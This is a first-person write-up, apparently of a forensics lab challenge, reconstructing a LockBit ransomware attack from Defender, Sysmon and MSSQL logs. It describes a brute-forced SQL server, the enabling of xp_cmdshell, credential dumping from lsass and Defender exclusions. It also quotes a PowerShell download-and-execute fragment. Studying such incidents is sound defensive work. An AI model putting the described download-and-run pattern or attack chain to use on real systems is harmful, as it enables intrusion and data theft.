Tate | Security+ | CDSA | CCD

LockBit

Scenario:

A medium-sized corporation has experienced a ransomware attack, first identified when a user reported a ransom note on their screen alongside a Windows Defender alert indicating malicious activity. Your task is to analyze logs provided from the compromised machines and identify the ransomware’s entry point.

Walkthrough & Analysis

Looking at Microsoft Protection Logs (MPlog.txt)

2024-09-17_21-13

Starting with the Domain Controller (DC01), I examine the Defender logs to identify any flagged activites on ths system.

A suspicious executable file in the ADMIN$ share on the Domain Controller raises immediate concern.

2024-09-17_21-18

MPLogs, or “Microsoft Protection” logs, are generated by Defender or MS Security Essentials. They provide a good initial overview of potential threats on the system.

As seen, we observe the supposed CobaltStrike executable adding a file path to the exclusions list, instructing Defender to skip scanning the entire “C:\” drive path for malicious activity.

2024-09-17_21-40

2024-09-17_21-41

Comparing these two event logs reveals communication between two internal IPs (the DC and another machine) through unusual port numbers just before the malicious software installation.

To confirm 192.168.170.142 as the IP address of the Domain Controller, we examine the SYSTEM root hive of the DC01 triage image.

Using Registry Explorer to Locate DC01’s Assigned IP

image

This IP address is confirmed as the only one assigned to the DC01 system.

I could spend all day snooping around in this KAPE image. Instead of getting tunnelvision, I will pivot to analyzing the SQL server to understand the attack’s scope better, starting again with the Defender logs.

Analyzing MPlogs on SQL Server

2024-09-18_00-51

Defender has detected and blocked cmd.exe from executing commands, warranting further investigation.

Examining Windows (Sysmon) Event Logs

2024-09-18_01-24

We observe the same Process ID (PID) being spawned from the sqlservr executable in the Program Files directory. This cmd.exe process uses PowerShell to download a payload script from a remote IP address.

So far, we have confirmed two infections, but how did the attacker gain access to the SQL server? Luckily, in our KAPE data, we have MSSQL error logs, which can provide us with valuable insight into the server’s activity during this timeframe.

2024-09-18_01-59

These logs reveal that the attacker brute-forced their way into the SQL server and subsequently enabled the “xp_cmdshell” feature, allowing remote command execution.

Returning to the Sysmon logs, our attack timeline becomes clearer. After enabling xp_cmdshell, PowerShell executes a sequence of commands:

  1. Uses Uses “IEX (New-Object Net.WebClient).DownloadString” to download a PowerShell script from a remote host.
  2. Injects into winlogon.exe [PID 596] -> Creates Remote Pipe to \postex_c352 (CobaltStrike Post Exploitation Framework).
  3. Executes encoded PowerShell payloads in memory.
  4. Dumps lsass.exe process and extracts credentials.

2024-09-18_02-31

We notice a familiar pattern: the payload creates a Defender exclusion for the folder path “C:\” on both FileServer and DevPC.

2024-09-18_03-07

Firstly, On FileServer we see a malicious executable blocked by Defender.

Now to look at DevPC…

2024-09-18_03-13

The 32-bit version of Rundll32.exe creating vmware.exe in the Temp folder is highly suspicious and warrants investigation.

image

Since I have VMware installed locally I decided to double check. As I expected, the default path for the vmware executable file will be in either Program Files or Program Files (x86).

2024-09-18_03-17

2024-09-18_03-19

Ransomware Execution

The malicious executable creates a README.txt file in the Downloads folder and subsequently overwrites every file in the C:\ drive, indicating a successful ransomware attack.

Conclusion

This analysis reveals a sophisticated ransomware attack involving multiple stages:

  1. Initial compromise of the SQL server through brute-force attacks.
  2. Utilization of SQL server features for command execution.
  3. Lateral movement to other systems using domain Shares.
  4. Deployment and execution of the LockBit ransomware.

Takeaways

You probably can’t tell from how concise of a writeup this is, but I actually spent a decent amount of time on this challenge -more than I should’ve. One thing I am learning as an analyst is to recognize when I’m starting to get tunnelvision and to remain focused on the bigger picture. With proper context, I’m able to more efficently navigate and replicate the attacker’s moves.